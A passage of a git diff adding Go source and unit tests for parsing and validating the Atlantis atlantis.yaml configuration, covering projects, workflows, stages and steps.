+ },
+ },
+ Plan: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ },
+ },
+ },
+ },
+ },
+ Projects: []valid.Project{
+ {
+ Dir: "mydir",
+ Workspace: "default",
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ },
+ },
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Equals(t, c.exp, c.input.ToValid())
+ })
+ }
+}
diff --git a/server/events/yaml/raw/project.go b/server/events/yaml/raw/project.go
new file mode 100644
index 0000000000..3de10b5320
--- /dev/null
+++ b/server/events/yaml/raw/project.go
@@ -0,0 +1,85 @@
+package raw
+
+import (
+ "fmt"
+ "strings"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/hashicorp/go-version"
+ "github.com/pkg/errors"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+const (
+ DefaultWorkspace = "default"
+ ApprovedApplyRequirement = "approved"
+)
+
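+// Project is the raw YAML representation of a single project. Fields are
+// pointers so we can distinguish keys that were omitted from zero values.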
+type Project struct {
+ Name *string `yaml:"name,omitempty"`
+ Dir *string `yaml:"dir,omitempty"`
+ Workspace *string `yaml:"workspace,omitempty"`
+ Workflow *string `yaml:"workflow,omitempty"`
+ TerraformVersion *string `yaml:"terraform_version,omitempty"`
+ Autoplan *Autoplan `yaml:"autoplan,omitempty"`
+ ApplyRequirements []string `yaml:"apply_requirements,omitempty"`
+}
+
+func (p Project) Validate() error {
+ hasDotDot := func(value interface{}) error {
+ if strings.Contains(*value.(*string), "..") {
+ return errors.New("cannot contain '..'")
+ }
+ return nil
+ }
+ validApplyReq := func(value interface{}) error {
+ reqs := value.([]string)
+ for _, r := range reqs {
+ if r != ApprovedApplyRequirement {
+ return fmt.Errorf("%q not supported, only %s is supported", r, ApprovedApplyRequirement)
+ }
+ }
+ return nil
+ }
+ validTFVersion := func(value interface{}) error {
+ strPtr := value.(*string)
+ if strPtr == nil {
+ return nil
+ }
+ _, err := version.NewVersion(*strPtr)
+ return errors.Wrapf(err, "version %q could not be parsed", *strPtr)
+ }
+ return validation.ValidateStruct(&p,
+ validation.Field(&p.Dir, validation.Required, validation.By(hasDotDot)),
+ validation.Field(&p.ApplyRequirements, validation.By(validApplyReq)),
+ validation.Field(&p.TerraformVersion, validation.By(validTFVersion)),
+ )
+}
+
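+// ToValid returns the validated project, applying defaults for unset fields.
+// It assumes Validate() has already been run, so Dir is non-nil.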
+func (p Project) ToValid() valid.Project {
+ var v valid.Project
+ v.Dir = *p.Dir
+
+ if p.Workspace == nil {
+ v.Workspace = DefaultWorkspace
+ } else {
+ v.Workspace = *p.Workspace
+ }
+
+ v.Workflow = p.Workflow
+ if p.TerraformVersion != nil {
+ v.TerraformVersion, _ = version.NewVersion(*p.TerraformVersion)
+ }
+ if p.Autoplan == nil {
+ v.Autoplan = DefaultAutoPlan()
+ } else {
+ v.Autoplan = p.Autoplan.ToValid()
+ }
+
+ // There are no default apply requirements.
+ v.ApplyRequirements = p.ApplyRequirements
+
+ v.Name = p.Name
+
+ return v
+}
diff --git a/server/events/yaml/raw/project_test.go b/server/events/yaml/raw/project_test.go
new file mode 100644
index 0000000000..79f0cf7dbf
--- /dev/null
+++ b/server/events/yaml/raw/project_test.go
@@ -0,0 +1,226 @@
+package raw_test
+
+import (
+ "testing"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/hashicorp/go-version"
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+ "gopkg.in/yaml.v2"
+)
+
+func TestProject_UnmarshalYAML(t *testing.T) {
+ cases := []struct {
+ description string
+ input string
+ exp raw.Project
+ }{
+ {
+ description: "omit unset fields",
+ input: "",
+ exp: raw.Project{
+ Dir: nil,
+ Workspace: nil,
+ Workflow: nil,
+ TerraformVersion: nil,
+ Autoplan: nil,
+ ApplyRequirements: nil,
+ Name: nil,
+ },
+ },
+ {
+ description: "all fields set",
+ input: `
+name: myname
+dir: mydir
+workspace: workspace
+workflow: workflow
+terraform_version: v0.11.0
+autoplan:
+ when_modified: []
+ enabled: false
+apply_requirements:
+- mergeable`,
+ exp: raw.Project{
+ Name: String("myname"),
+ Dir: String("mydir"),
+ Workspace: String("workspace"),
+ Workflow: String("workflow"),
+ TerraformVersion: String("v0.11.0"),
+ Autoplan: &raw.Autoplan{
+ WhenModified: []string{},
+ Enabled: Bool(false),
+ },
+ ApplyRequirements: []string{"mergeable"},
+ },
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ var p raw.Project
+ err := yaml.UnmarshalStrict([]byte(c.input), &p)
+ Ok(t, err)
+ Equals(t, c.exp, p)
+ })
+ }
+}
+
+func TestProject_Validate(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Project
+ expErr string
+ }{
+ {
+ description: "minimal fields",
+ input: raw.Project{
+ Dir: String("."),
+ },
+ expErr: "",
+ },
+ {
+ description: "dir empty",
+ input: raw.Project{
+ Dir: nil,
+ },
+ expErr: "dir: cannot be blank.",
+ },
+ {
+ description: "dir with ..",
+ input: raw.Project{
+ Dir: String("../mydir"),
+ },
+ expErr: "dir: cannot contain '..'.",
+ },
+ {
+ description: "apply reqs with unsupported",
+ input: raw.Project{
+ Dir: String("."),
+ ApplyRequirements: []string{"unsupported"},
+ },
+ expErr: "apply_requirements: \"unsupported\" not supported, only approved is supported.",
+ },
+ {
+ description: "apply reqs with valid",
+ input: raw.Project{
+ Dir: String("."),
+ ApplyRequirements: []string{"approved"},
+ },
+ expErr: "",
+ },
+ {
+ description: "empty tf version string",
+ input: raw.Project{
+ Dir: String("."),
+ TerraformVersion: String(""),
+ },
+ expErr: "terraform_version: version \"\" could not be parsed: Malformed version: .",
+ },
+ {
+ description: "tf version with v prepended",
+ input: raw.Project{
+ Dir: String("."),
+ TerraformVersion: String("v1"),
+ },
+ expErr: "",
+ },
+ {
+ description: "tf version without prepended",
+ input: raw.Project{
+ Dir: String("."),
+ TerraformVersion: String("1"),
+ },
+ expErr: "",
+ },
+ }
+ validation.ErrorTag = "yaml"
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ err := c.input.Validate()
+ if c.expErr == "" {
+ Ok(t, err)
+ } else {
+ ErrEquals(t, c.expErr, err)
+ }
+ })
+ }
+}
+
+func TestProject_ToValid(t *testing.T) {
+ tfVersionPointEleven, _ := version.NewVersion("v0.11.0")
+ cases := []struct {
+ description string
+ input raw.Project
+ exp valid.Project
+ }{
+ {
+ description: "minimal values",
+ input: raw.Project{
+ Dir: String("."),
+ },
+ exp: valid.Project{
+ Dir: ".",
+ Workspace: "default",
+ Workflow: nil,
+ TerraformVersion: nil,
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ ApplyRequirements: nil,
+ Name: nil,
+ },
+ },
+ {
+ description: "all set",
+ input: raw.Project{
+ Dir: String("."),
+ Workspace: String("myworkspace"),
+ Workflow: String("myworkflow"),
+ TerraformVersion: String("v0.11.0"),
+ Autoplan: &raw.Autoplan{
+ WhenModified: []string{"hi"},
+ Enabled: Bool(false),
+ },
+ ApplyRequirements: []string{"approved"},
+ Name: String("myname"),
+ },
+ exp: valid.Project{
+ Dir: ".",
+ Workspace: "myworkspace",
+ Workflow: String("myworkflow"),
+ TerraformVersion: tfVersionPointEleven,
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"hi"},
+ Enabled: false,
+ },
+ ApplyRequirements: []string{"approved"},
+ Name: String("myname"),
+ },
+ },
+ {
+ description: "tf version without 'v'",
+ input: raw.Project{
+ Dir: String("."),
+ TerraformVersion: String("0.11.0"),
+ },
+ exp: valid.Project{
+ Dir: ".",
+ Workspace: "default",
+ TerraformVersion: tfVersionPointEleven,
+ Autoplan: valid.Autoplan{
+ WhenModified: []string{"**/*.tf"},
+ Enabled: true,
+ },
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Equals(t, c.exp, c.input.ToValid())
+ })
+ }
+}
diff --git a/server/events/yaml/raw/raw.go b/server/events/yaml/raw/raw.go
new file mode 100644
index 0000000000..2c08e6a820
--- /dev/null
+++ b/server/events/yaml/raw/raw.go
@@ -0,0 +1,4 @@
+// Package raw contains the golang representations of the YAML elements
+// supported in atlantis.yaml. The structs here represent the exact data that
+// comes from the file before it is parsed/validated further.
+package raw
diff --git a/server/events/yaml/raw/raw_test.go b/server/events/yaml/raw/raw_test.go
new file mode 100644
index 0000000000..e0f43fac6d
--- /dev/null
+++ b/server/events/yaml/raw/raw_test.go
@@ -0,0 +1,13 @@
+package raw_test
+
+// Bool is a helper routine that allocates a new bool value
+// to store v and returns a pointer to it.
+func Bool(v bool) *bool { return &v }
+
+// Int is a helper routine that allocates a new int value
+// to store v and returns a pointer to it.
+func Int(v int) *int { return &v }
+
+// String is a helper routine that allocates a new string value
+// to store v and returns a pointer to it.
+func String(v string) *string { return &v }
diff --git a/server/events/yaml/raw/stage.go b/server/events/yaml/raw/stage.go
new file mode 100644
index 0000000000..67eef1d3be
--- /dev/null
+++ b/server/events/yaml/raw/stage.go
@@ -0,0 +1,26 @@
+package raw
+
+import (
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
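+// Stage is the raw YAML representation of a list of steps, ex. the plan or
+// apply block of a workflow.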
+type Stage struct {
+ Steps []Step `yaml:"steps,omitempty"`
+}
+
+func (s Stage) Validate() error {
+ return validation.ValidateStruct(&s,
+ validation.Field(&s.Steps),
+ )
+}
+
+func (s Stage) ToValid() valid.Stage {
+ var validSteps []valid.Step
+ for _, s := range s.Steps {
+ validSteps = append(validSteps, s.ToValid())
+ }
+ return valid.Stage{
+ Steps: validSteps,
+ }
+}
diff --git a/server/events/yaml/raw/stage_test.go b/server/events/yaml/raw/stage_test.go
new file mode 100644
index 0000000000..245ed2c4f3
--- /dev/null
+++ b/server/events/yaml/raw/stage_test.go
@@ -0,0 +1,103 @@
+package raw_test
+
+import (
+ "testing"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+ "gopkg.in/yaml.v2"
+)
+
+func TestStage_UnmarshalYAML(t *testing.T) {
+ cases := []struct {
+ description string
+ input string
+ exp raw.Stage
+ }{
+ {
+ description: "empty",
+ input: "",
+ exp: raw.Stage{
+ Steps: nil,
+ },
+ },
+ {
+ description: "all fields set",
+ input: `
+steps: [step1]
+`,
+ exp: raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("step1"),
+ },
+ },
+ },
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ var a raw.Stage
+ err := yaml.UnmarshalStrict([]byte(c.input), &a)
+ Ok(t, err)
+ Equals(t, c.exp, a)
+ })
+ }
+}
+
+func TestStage_Validate(t *testing.T) {
+ // Should validate each step.
+ s := raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("invalid"),
+ },
+ },
+ }
+ validation.ErrorTag = "yaml"
+ ErrEquals(t, "steps: (0: \"invalid\" is not a valid step type.).", s.Validate())
+
+ // Empty steps should validate.
+ Ok(t, (raw.Stage{}).Validate())
+}
+
+func TestStage_ToValid(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Stage
+ exp valid.Stage
+ }{
+ {
+ description: "nothing set",
+ input: raw.Stage{},
+ exp: valid.Stage{
+ Steps: nil,
+ },
+ },
+ {
+ description: "fields set",
+ input: raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("init"),
+ },
+ },
+ },
+ exp: valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ },
+ },
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Equals(t, c.exp, c.input.ToValid())
+ })
+ }
+}
diff --git a/server/events/yaml/raw/step.go b/server/events/yaml/raw/step.go
new file mode 100644
index 0000000000..a5b5c633eb
--- /dev/null
+++ b/server/events/yaml/raw/step.go
@@ -0,0 +1,200 @@
+package raw
+
+import (
+ "errors"
+ "fmt"
+ "sort"
+ "strings"
+
+ "github.com/flynn-archive/go-shlex"
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
+const (
+ ExtraArgsKey = "extra_args"
+ RunStepName = "run"
+ PlanStepName = "plan"
+ ApplyStepName = "apply"
+ InitStepName = "init"
+)
+
+// Step represents a single action/command to perform. In YAML, it can be set as
+// 1. A single string for a built-in command:
+// - init
+// - plan
+// 2. A map for a built-in command and extra_args:
+// - plan:
+// extra_args: [-var-file=staging.tfvars]
+// 3. A map for a custom run command:
+// - run: my custom command
+// Here we parse the step in the most generic fashion possible; see the field
+// comments for more details.
+type Step struct {
+	// Key will be set in case #1 above to the name of the step, ex. "init".
+	// In cases #2 and #3 the element is a map, so Map or StringVal is set
+	// instead and Key is left nil.
+ Key *string
+ // Map will be set in case #2 above.
+ Map map[string]map[string][]string
+ // StringVal will be set in case #3 above.
+ StringVal map[string]string
+}
+
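+// UnmarshalYAML implements yaml.Unmarshaler. It tries each legal shape in
+// turn: single string, then map with extra_args, then run-step map, and keeps
+// the first one that parses. Whether the contents are legal is checked later
+// in Validate().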
+func (s *Step) UnmarshalYAML(unmarshal func(interface{}) error) error {
+ // First try to unmarshal as a single string, ex.
+ // steps:
+ // - init
+ // - plan
+ // We validate if it's a legal string later.
+ var singleString string
+ err := unmarshal(&singleString)
+ if err == nil {
+ s.Key = &singleString
+ return nil
+ }
+
+ // This represents a step with extra_args, ex:
+ // init:
+ // extra_args: [a, b]
+ // We validate if there's a single key in the map and if the value is a
+ // legal value later.
+ var step map[string]map[string][]string
+ err = unmarshal(&step)
+ if err == nil {
+ s.Map = step
+ return nil
+ }
+
+ // Try to unmarshal as a custom run step, ex.
+ // steps:
+ // - run: my command
+ // We validate if the key is run later.
+ var runStep map[string]string
+ err = unmarshal(&runStep)
+ if err == nil {
+ s.StringVal = runStep
+ return nil
+ }
+
+ return err
+}
+
+func (s Step) Validate() error {
+ validStep := func(value interface{}) error {
+ str := *value.(*string)
+ if str != InitStepName && str != PlanStepName && str != ApplyStepName {
+ return fmt.Errorf("%q is not a valid step type", str)
+ }
+ return nil
+ }
+
+ extraArgs := func(value interface{}) error {
+ elem := value.(map[string]map[string][]string)
+ var keys []string
+ for k := range elem {
+ keys = append(keys, k)
+ }
+		// Sort the keys so the error message (and tests) are deterministic.
+ sort.Strings(keys)
+
+ if len(keys) > 1 {
+ return fmt.Errorf("step element can only contain a single key, found %d: %s",
+ len(keys), strings.Join(keys, ","))
+ }
+ for stepName, args := range elem {
+ if stepName != InitStepName && stepName != PlanStepName && stepName != ApplyStepName {
+ return fmt.Errorf("%q is not a valid step type", stepName)
+ }
+ var argKeys []string
+ for k := range args {
+ argKeys = append(argKeys, k)
+ }
+
+ // args should contain a single 'extra_args' key.
+ if len(argKeys) > 1 {
+ return fmt.Errorf("built-in steps only support a single %s key, found %d: %s",
+ ExtraArgsKey, len(argKeys), strings.Join(argKeys, ","))
+ }
+ for k := range args {
+ if k != ExtraArgsKey {
+ return fmt.Errorf("built-in steps only support a single %s key, found %q in step %s", ExtraArgsKey, k, stepName)
+ }
+ }
+ }
+ return nil
+ }
+
+ runStep := func(value interface{}) error {
+ elem := value.(map[string]string)
+ var keys []string
+ for k := range elem {
+ keys = append(keys, k)
+ }
+		// Sort the keys so the error message (and tests) are deterministic.
+ sort.Strings(keys)
+
+ if len(keys) > 1 {
+ return fmt.Errorf("step element can only contain a single key, found %d: %s",
+ len(keys), strings.Join(keys, ","))
+ }
+ for stepName, args := range elem {
+ if stepName != RunStepName {
+ return fmt.Errorf("%q is not a valid step type", stepName)
+ }
+ _, err := shlex.Split(args)
+ if err != nil {
+ return fmt.Errorf("unable to parse as shell command: %s", err)
+ }
+ }
+ return nil
+ }
+
+ if s.Key != nil {
+ return validation.Validate(s.Key, validation.By(validStep))
+ }
+ if len(s.Map) > 0 {
+ return validation.Validate(s.Map, validation.By(extraArgs))
+ }
+ if len(s.StringVal) > 0 {
+ return validation.Validate(s.StringVal, validation.By(runStep))
+ }
+ return errors.New("step element is empty")
+}
+
+func (s Step) ToValid() valid.Step {
+ // This will trigger in case #1 (see Step docs).
+ if s.Key != nil {
+ return valid.Step{
+ StepName: *s.Key,
+ }
+ }
+
+ // This will trigger in case #2 (see Step docs).
+ if len(s.Map) > 0 {
+ // After validation we assume there's only one key and it's a valid
+ // step name so we just use the first one.
+ for stepName, stepArgs := range s.Map {
+ return valid.Step{
+ StepName: stepName,
+ ExtraArgs: stepArgs[ExtraArgsKey],
+ }
+ }
+ }
+
+ // This will trigger in case #3 (see Step docs).
+ if len(s.StringVal) > 0 {
+ // After validation we assume there's only one key and it's a valid
+ // step name so we just use the first one.
+ for _, v := range s.StringVal {
+ // We ignore the error here because it should have been checked in
+ // Validate().
+ split, _ := shlex.Split(v) // nolint: errcheck
+ return valid.Step{
+ StepName: RunStepName,
+ RunCommand: split,
+ }
+ }
+ }
+
+ panic("step was not valid. This is a bug!")
+}
diff --git a/server/events/yaml/raw/step_test.go b/server/events/yaml/raw/step_test.go
new file mode 100644
index 0000000000..ec8a5d4934
--- /dev/null
+++ b/server/events/yaml/raw/step_test.go
@@ -0,0 +1,387 @@
+package raw_test
+
+import (
+ "testing"
+
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+ "gopkg.in/yaml.v2"
+)
+
+func TestStep_UnmarshalYAML(t *testing.T) {
+ cases := []struct {
+ description string
+ input string
+ exp raw.Step
+ expErr string
+ }{
+
+ // Single string.
+ {
+ description: "single string",
+ input: `astring`,
+ exp: raw.Step{
+ Key: String("astring"),
+ },
+ },
+
+ // MapType i.e. extra_args style.
+ {
+ description: "extra_args style",
+ input: `
+key:
+ mapValue: [arg1, arg2]`,
+ exp: raw.Step{
+ Map: MapType{
+ "key": {
+ "mapValue": {"arg1", "arg2"},
+ },
+ },
+ },
+ },
+ {
+ description: "extra_args style multiple keys",
+ input: `
+key:
+ mapValue: [arg1, arg2]
+ value2: []`,
+ exp: raw.Step{
+ Map: MapType{
+ "key": {
+ "mapValue": {"arg1", "arg2"},
+ "value2": {},
+ },
+ },
+ },
+ },
+ {
+ description: "extra_args style multiple top-level keys",
+ input: `
+key:
+ val1: []
+key2:
+ val2: []`,
+ exp: raw.Step{
+ Map: MapType{
+ "key": {
+ "val1": {},
+ },
+ "key2": {
+ "val2": {},
+ },
+ },
+ },
+ },
+
+ // Run-step style
+ {
+ description: "run step",
+ input: `
+run: my command`,
+ exp: raw.Step{
+ StringVal: map[string]string{
+ "run": "my command",
+ },
+ },
+ },
+ {
+ description: "run step multiple top-level keys",
+ input: `
+run: my command
+key: value`,
+ exp: raw.Step{
+ StringVal: map[string]string{
+ "run": "my command",
+ "key": "value",
+ },
+ },
+ },
+
+ // Empty
+ {
+ description: "empty",
+ input: "",
+ exp: raw.Step{
+ Key: nil,
+ Map: nil,
+ StringVal: nil,
+ },
+ },
+
+ // Errors
+ {
+ description: "extra args style no slice strings",
+ input: `
+key:
+ value:
+ another: map`,
+ expErr: "yaml: unmarshal errors:\n line 3: cannot unmarshal !!map into string",
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ var got raw.Step
+ err := yaml.UnmarshalStrict([]byte(c.input), &got)
+ if c.expErr != "" {
+ ErrEquals(t, c.expErr, err)
+ return
+ }
+ Ok(t, err)
+ Equals(t, c.exp, got)
+ })
+ }
+}
+
+func TestStep_Validate(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Step
+ expErr string
+ }{
+ // Valid inputs.
+ {
+ description: "init step",
+ input: raw.Step{
+ Key: String("init"),
+ },
+ expErr: "",
+ },
+ {
+ description: "plan step",
+ input: raw.Step{
+ Key: String("plan"),
+ },
+ expErr: "",
+ },
+ {
+ description: "apply step",
+ input: raw.Step{
+ Key: String("apply"),
+ },
+ expErr: "",
+ },
+ {
+ description: "init extra_args",
+ input: raw.Step{
+ Map: MapType{
+ "init": {
+ "extra_args": []string{"arg1", "arg2"},
+ },
+ },
+ },
+ expErr: "",
+ },
+ {
+ description: "plan extra_args",
+ input: raw.Step{
+ Map: MapType{
+ "plan": {
+ "extra_args": []string{"arg1", "arg2"},
+ },
+ },
+ },
+ expErr: "",
+ },
+ {
+ description: "apply extra_args",
+ input: raw.Step{
+ Map: MapType{
+ "apply": {
+ "extra_args": []string{"arg1", "arg2"},
+ },
+ },
+ },
+ expErr: "",
+ },
+ {
+ description: "run step",
+ input: raw.Step{
+ StringVal: map[string]string{
+ "run": "my command",
+ },
+ },
+ expErr: "",
+ },
+
+ // Invalid inputs.
+ {
+ description: "empty elem",
+ input: raw.Step{},
+ expErr: "step element is empty",
+ },
+ {
+ description: "invalid step name",
+ input: raw.Step{
+ Key: String("invalid"),
+ },
+ expErr: "\"invalid\" is not a valid step type",
+ },
+ {
+ description: "multiple keys in map",
+ input: raw.Step{
+ Map: MapType{
+ "key1": nil,
+ "key2": nil,
+ },
+ },
+ expErr: "step element can only contain a single key, found 2: key1,key2",
+ },
+ {
+ description: "multiple keys in string val",
+ input: raw.Step{
+ StringVal: map[string]string{
+ "key1": "",
+ "key2": "",
+ },
+ },
+ expErr: "step element can only contain a single key, found 2: key1,key2",
+ },
+ {
+ description: "invalid key in map",
+ input: raw.Step{
+ Map: MapType{
+ "invalid": nil,
+ },
+ },
+ expErr: "\"invalid\" is not a valid step type",
+ },
+ {
+ description: "invalid key in string val",
+ input: raw.Step{
+ StringVal: map[string]string{
+ "invalid": "",
+ },
+ },
+ expErr: "\"invalid\" is not a valid step type",
+ },
+ {
+ description: "non extra_arg key",
+ input: raw.Step{
+ Map: MapType{
+ "init": {
+ "invalid": nil,
+ },
+ },
+ },
+ expErr: "built-in steps only support a single extra_args key, found \"invalid\" in step init",
+ },
+ {
+ description: "unparseable shell command",
+ input: raw.Step{
+ StringVal: map[string]string{
+ "run": "my 'c",
+ },
+ },
+ expErr: "unable to parse as shell command: EOF found when expecting closing quote.",
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ err := c.input.Validate()
+ if c.expErr == "" {
+ Ok(t, err)
+ return
+ }
+ ErrEquals(t, c.expErr, err)
+ })
+ }
+}
+
+func TestStep_ToValid(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Step
+ exp valid.Step
+ }{
+ {
+ description: "init step",
+ input: raw.Step{
+ Key: String("init"),
+ },
+ exp: valid.Step{
+ StepName: "init",
+ },
+ },
+ {
+ description: "plan step",
+ input: raw.Step{
+ Key: String("plan"),
+ },
+ exp: valid.Step{
+ StepName: "plan",
+ },
+ },
+ {
+ description: "apply step",
+ input: raw.Step{
+ Key: String("apply"),
+ },
+ exp: valid.Step{
+ StepName: "apply",
+ },
+ },
+ {
+ description: "init extra_args",
+ input: raw.Step{
+ Map: MapType{
+ "init": {
+ "extra_args": []string{"arg1", "arg2"},
+ },
+ },
+ },
+ exp: valid.Step{
+ StepName: "init",
+ ExtraArgs: []string{"arg1", "arg2"},
+ },
+ },
+ {
+ description: "plan extra_args",
+ input: raw.Step{
+ Map: MapType{
+ "plan": {
+ "extra_args": []string{"arg1", "arg2"},
+ },
+ },
+ },
+ exp: valid.Step{
+ StepName: "plan",
+ ExtraArgs: []string{"arg1", "arg2"},
+ },
+ },
+ {
+ description: "apply extra_args",
+ input: raw.Step{
+ Map: MapType{
+ "apply": {
+ "extra_args": []string{"arg1", "arg2"},
+ },
+ },
+ },
+ exp: valid.Step{
+ StepName: "apply",
+ ExtraArgs: []string{"arg1", "arg2"},
+ },
+ },
+ {
+ description: "run step",
+ input: raw.Step{
+ StringVal: map[string]string{
+ "run": "my 'run command'",
+ },
+ },
+ exp: valid.Step{
+ StepName: "run",
+ RunCommand: []string{"my", "run command"},
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Equals(t, c.exp, c.input.ToValid())
+ })
+ }
+}
+
+type MapType map[string]map[string][]string
diff --git a/server/events/yaml/raw/workflow.go b/server/events/yaml/raw/workflow.go
new file mode 100644
index 0000000000..1a6dc73245
--- /dev/null
+++ b/server/events/yaml/raw/workflow.go
@@ -0,0 +1,31 @@
+package raw
+
+import (
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+)
+
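+// Workflow is the raw YAML representation of a workflow. A nil stage means
+// the key was unset and defaults apply.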
+type Workflow struct {
+ Apply *Stage `yaml:"apply,omitempty"`
+ Plan *Stage `yaml:"plan,omitempty"`
+}
+
+func (w Workflow) Validate() error {
+ return validation.ValidateStruct(&w,
+ validation.Field(&w.Apply),
+ validation.Field(&w.Plan),
+ )
+}
+
+func (w Workflow) ToValid() valid.Workflow {
+ var v valid.Workflow
+ if w.Apply != nil {
+ apply := w.Apply.ToValid()
+ v.Apply = &apply
+ }
+ if w.Plan != nil {
+ plan := w.Plan.ToValid()
+ v.Plan = &plan
+ }
+ return v
+}
diff --git a/server/events/yaml/raw/workflow_test.go b/server/events/yaml/raw/workflow_test.go
new file mode 100644
index 0000000000..85320cfaad
--- /dev/null
+++ b/server/events/yaml/raw/workflow_test.go
@@ -0,0 +1,168 @@
+package raw_test
+
+import (
+ "testing"
+
+ "github.com/go-ozzo/ozzo-validation"
+ "github.com/runatlantis/atlantis/server/events/yaml/raw"
+ "github.com/runatlantis/atlantis/server/events/yaml/valid"
+ . "github.com/runatlantis/atlantis/testing"
+ "gopkg.in/yaml.v2"
+)
+
+func TestWorkflow_UnmarshalYAML(t *testing.T) {
+ cases := []struct {
+ description string
+ input string
+ exp raw.Workflow
+ expErr string
+ }{
+ {
+ description: "empty",
+ input: ``,
+ exp: raw.Workflow{
+ Apply: nil,
+ Plan: nil,
+ },
+ },
+ {
+ description: "yaml null",
+ input: `~`,
+ exp: raw.Workflow{
+ Apply: nil,
+ Plan: nil,
+ },
+ },
+ {
+ description: "only plan/apply set",
+ input: `
+plan:
+apply:
+`,
+ exp: raw.Workflow{
+ Apply: nil,
+ Plan: nil,
+ },
+ },
+ {
+ description: "steps set to null",
+ input: `
+plan:
+ steps: ~
+apply:
+ steps: ~`,
+ exp: raw.Workflow{
+ Plan: &raw.Stage{
+ Steps: nil,
+ },
+ Apply: &raw.Stage{
+ Steps: nil,
+ },
+ },
+ },
+ {
+ description: "steps set to empty slice",
+ input: `
+plan:
+ steps: []
+apply:
+ steps: []`,
+ exp: raw.Workflow{
+ Plan: &raw.Stage{
+ Steps: []raw.Step{},
+ },
+ Apply: &raw.Stage{
+ Steps: []raw.Step{},
+ },
+ },
+ },
+ }
+
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ var w raw.Workflow
+ err := yaml.UnmarshalStrict([]byte(c.input), &w)
+ if c.expErr != "" {
+ ErrEquals(t, c.expErr, err)
+ return
+ }
+ Ok(t, err)
+ Equals(t, c.exp, w)
+ })
+ }
+}
+
+func TestWorkflow_Validate(t *testing.T) {
+ // Should call the validate of Stage.
+ w := raw.Workflow{
+ Apply: &raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("invalid"),
+ },
+ },
+ },
+ }
+ validation.ErrorTag = "yaml"
+ ErrEquals(t, "apply: (steps: (0: \"invalid\" is not a valid step type.).).", w.Validate())
+
+ // Unset keys should validate.
+ Ok(t, (raw.Workflow{}).Validate())
+}
+
+func TestWorkflow_ToValid(t *testing.T) {
+ cases := []struct {
+ description string
+ input raw.Workflow
+ exp valid.Workflow
+ }{
+ {
+ description: "nothing set",
+ input: raw.Workflow{},
+ exp: valid.Workflow{
+ Apply: nil,
+ Plan: nil,
+ },
+ },
+ {
+ description: "fields set",
+ input: raw.Workflow{
+ Apply: &raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("init"),
+ },
+ },
+ },
+ Plan: &raw.Stage{
+ Steps: []raw.Step{
+ {
+ Key: String("init"),
+ },
+ },
+ },
+ },
+ exp: valid.Workflow{
+ Apply: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ },
+ },
+ },
+ Plan: &valid.Stage{
+ Steps: []valid.Step{
+ {
+ StepName: "init",
+ },
+ },
+ },
+ },
+ },
+ }
+ for _, c := range cases {
+ t.Run(c.description, func(t *testing.T) {
+ Equals(t, c.exp, c.input.ToValid())
+ })
+ }
+}
diff --git a/server/events/yaml/valid/valid.go b/server/events/yaml/valid/valid.go
new file mode 100644
index 0000000000..8046c0fa05
--- /dev/null
+++ b/server/events/yaml/valid/valid.go
@@ -0,0 +1,81 @@
+// Package valid contains the structs representing the atlantis.yaml config
+// after it's been parsed and validated.
+package valid
+
+import "github.com/hashicorp/go-version"
+
+// Config is the atlantis.yaml config after it's been parsed and validated.
+type Config struct {
+ // Version is the version of the atlantis YAML file. Will always be equal
+ // to 2.
+ Version int
+ Projects []Project
+ Workflows map[string]Workflow
+}
+
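+// GetPlanStage returns the plan stage of the named workflow, or nil if that
+// workflow doesn't exist or has no plan stage.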
+func (c Config) GetPlanStage(workflowName string) *Stage {
+	if flow, ok := c.Workflows[workflowName]; ok {
+		return flow.Plan
+	}
+	return nil
+}
+
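+// GetApplyStage returns the apply stage of the named workflow, or nil if that
+// workflow doesn't exist or has no apply stage.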
